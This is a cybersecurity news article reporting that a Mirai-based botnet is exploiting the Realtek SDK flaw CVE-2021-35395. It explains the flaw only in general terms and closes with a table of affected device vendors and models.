Hundreds of thousands of Realtek-based devices under attack from IoT botnet
A dangerous vulnerability in Realtek chipsets used in hundreds of thousands of smart devices from at least 65 vendors is currently under attack from a notorious DDoS botnet gang.
The attacks started last week, according to a report from IoT security firm SAM, and began just three days after fellow security firm IoT Inspector published details about the vulnerability on its blog.
Vulnerability impacts little know but very popular Realtek SoC
Tracked as CVE-2021-35395, the vulnerability is part of four issues IoT Inspector researchers found in the software development kit (SDK) that ships with multiple Realtek chipsets (SoCs).
These chips are manufactured by Realtek but are shipped to other companies, which then use them as the basic System-on-Chip (SoC) board for their own devices, with the Realtek SDK serving as a configurator and starting point for their own firmware.
IoT Inspector said they found more than 200 different device models from at least 65 different vendors that had been built around these chips and were using the vulnerable SDK.
Estimated in the realm of hundreds of thousands of internet-connected devices, the list of vulnerable items includes routers, network gateways, Wi-Fi repeaters, IP cameras, smart lighting, and even internet-connected toys.
Of the four issues discovered by the IoT Inspector research team, the CVE-2021-35395 vulnerability received the highest severity rating, of 9.8 out of 10 on the CVSSv3 severity scale.
According to the research team, the vulnerability, which resided in a web panel used to configure the SDK/device, allowed a remote attacker to connect to these devices via malformed URL web panel parameters, bypass authentication, and run malicious code with the highest privileges, effectively taking over the device.
While Realtek released patches [PDF] before IoT Inspector published its findings last week, this was far too small of a time window for device vendors to deploy the security updates down the line to their own set of customers.
This means that today, the vast majority of these devices are still running outdated firmware (and an outdated Realtek SDK), being exposed to attacks.
A very busy botnet
Per SAM, exploitation started shortly after and came from the same Mirai-based botnet that a week before rushed to exploit a similar mega-bug in millions of routers running Arcadyan-based firmware.
The SAM research team said that based on their own scans, the most common device models currently running the vulnerable Realtek SDK include the likes of:
- Netis E1+ extender
- Edimax N150 and N300 Wi-Fi router
- Repotec RP-WR5444 router
Owners of such devices should look or inquire their sellers for new firmware patches. The full list of vulnerable devices is included below:
| Manufacturer | Affected Models |
|---|---|
| A-Link Europe Ltd | A-Link WNAP WNAP(b) |
| ARRIS Group, Inc | VAP4402_CALA |
| Airlive Corp. | WN-250R WN-350R |
| Abocom System Inc. | Wireless Router ? |
| AIgital | Wifi Range Extenders |
| Amped Wireless | AP20000G |
| Askey | AP5100W |
| ASUSTek Computer Inc. | RT-Nxx models, WL330-NUL Wireless WPS Router RT-N10E Wireless WPS Router RT-N10LX Wireless WPS Router RT-N12E Wireless WPS Router RT-N12LX |
| BEST ONE TECHNOLOGY CO., LTD. | AP-BNC-800 |
| Beeline | Smart Box v1 |
| Belkin | F9K1015 AC1200DB Wireless Router F9K1113 v4 AC1200FE Wireless Router F9K1123 AC750 Wireless Router F9K1116 N300WRX N600DB |
| Buffalo Inc. | WEX-1166DHP2 WEX-1166DHPS WEX-300HPS WEX-733DHPS WMR-433 WSR-1166DHP3 WSR-1166DHP4 WSR-1166DHPL WSR-1166DHPL2 |
| Calix Inc. | 804Mesh |
| China Mobile Communication Corp. | AN1202L |
| Compal Broadband Networks, INC. | CH66xx cable modems line. |
| D-Link | DIR-XXX models based on rlx-linux DAP-XXX models based on rlx-linux DIR-300 DIR-501 DIR-600L DIR-605C DIR-605L DIR-615 DIR-618 DIR-618b DIR-619 DIR-619L DIR-809 DIR-813 DIR-815 DIR-820L DIR-825 DIR-825AC DIR-825ACG1 DIR-842 DAP-1155 DAP-1155 A1 DAP-1360 C1 DAP-1360 B1 DSL-2640U DSL-2750U DSL_2640U VoIP Router DVG-2102S VoIP Router DVG-5004S VoIP Router DVG-N5402GF VoIP Router DVG-N5402SP VoIP Router DVG-N5412SP Wireless VoIP Device DVG-N5402SP |
| DASAN Networks | H150N |
| Davolink Inc. | DVW2700 1 DVW2700L 1 |
| Edge-core | VoIP Router ECG4510-05E-R01 |
| Edimax | RE-7438 BR6478N Wireless Router BR-6428nS N150 Wireless Router BR6228GNS N300 Wireless Router BR6428NS BR-6228nS/nC |
| Edison | unknown |
| EnGenius Technologies, Inc. | 11N Wireless Router Wireless AP Router |
| ELECOM Co.,LTD. | WRC-1467GHBK WRC-1900GHBK WRC-300FEBK-A WRC-733FEBK-A |
| Esson Technology Inc. | Wifi Module ESM8196 – https://fccid.io/RKOESM8196 (therefore any device using this wifi module) |
| EZ-NET Ubiquitous Corp. | NEXT-7004N |
| FIDA | PRN3005L D5 |
| Hama | unknown |
| Hawking Technologies, Inc. | HAWNR3 |
| MT-Link | MT-WR600N |
| I-O DATA DEVICE, INC. | WN-AC1167R WN-G300GR |
| iCotera | i6800 |
| IGD | 1T1R |
| LG International | Axler Router LGI-R104N Axler Router LGI-R104T Axler Router LGI-X501 Axler Router LGI-X502 Axler Router LGI-X503 Axler Router LGI-X601 Axler Router LGI-X602 Axler Router RT-DSE |
| LINK-NET TECHNOLOGY CO., LTD. | LW-N664R2 LW-U31 LW-U700 |
| Logitec | BR6428GNS LAN-W300N3L |
| MMC Technology | MM01-005H MM02-005H |
| MT-Link | MT-WR730N MT-WR760N MT-WR761N MT-WR761N+ MT-WR860N |
| NetComm Wireless | NF15ACV |
| Netis | WF2411 WF2411I WF2411R WF2419 WF2419I WF2419R WF2681 |
| Netgear | N300R |
| Nexxt Solutions | AEIEL304A1 AEIEL304U2 ARNEL304U1 |
| Observa Telecom | RTA01 |
| Occtel | VoIP Router ODC201AC VoIP Router OGC200W VoIP Router ONC200W VoIP Router SP300-DS VoIP Router SP5220SO VoIP Router SP5220SP |
| Omega Technology | Wireless N Router O31 OWLR151U Wireless N Router O70 OWLR307U |
| PATECH | Axler RT-TSE Axler Router R104 Axler Router R3 Axler Router X503 Axler Router X603 LotteMart Router 104L LotteMart Router 502L LotteMart Router 503L Router P104S Router P501 |
| PLANEX COMMUNICATIONS INC. Planex Communications Corp. | MZK-MF300N MZK-MR150 MZK-W300NH3 MZK-W300NR MZK-WNHR |
| PLANET Technology | VIP-281SW |
| Realtek | RTL8196C EV-2009-02-06 RTL8xxx EV-2009-02-06 RTL8xxx EV-2010-09-20 RTL8186 EV-2006-07-27 RTL8671 EV-2006-07-27 RTL8671 EV-2010-09-20 RTL8xxx EV-2006-07-27 RTL8xxx EV-2009-02-06 RTL8xxx EV-2010-09-20 |
| Revogi Systems | |
| Sitecom Europe BV | Sitecom Wireless Gigabit Router WLR-4001 Sitecom Wireless Router 150N X1 150N Sitecom Wireless Router 300N X2 300N Sitecom Wireless Router 300N X3 300N |
| Skystation | CWR-GN150S |
| Sercomm Corp. | Telmex Infinitum |
| Shaghal Ltd. | ERACN300 |
| Shenzhen Yichen (JCG) Technology Development Co., Ltd. | JYR-N490 |
| Skyworth Digital Technology. | Mesh Router |
| Smartlink | unknown |
| TCL Communication | unknown |
| Technicolor | TD5137 |
| Telewell | TW-EAV510 |
| Tenda | AC6, AC10, W6, W9, i21 |
| Totolink | A300R |
| TRENDnet, Inc. TRENDnet Technology, Corp. | TEW-651BR TEW-637AP TEW-638APB TEW-831DR |
| UPVEL | UR-315BN |
| ZTE | MF253V, MF910 |
| Zyxel | P-330W X150N NBG-2105 NBG-416N AP Router NBG-418N AP Router WAP6804 |
Catalin Cimpanu
is a cybersecurity reporter who previously worked at ZDNet and Bleeping Computer, where he became a well-known name in the industry for his constant scoops on new vulnerabilities, cyberattacks, and law enforcement actions against hackers.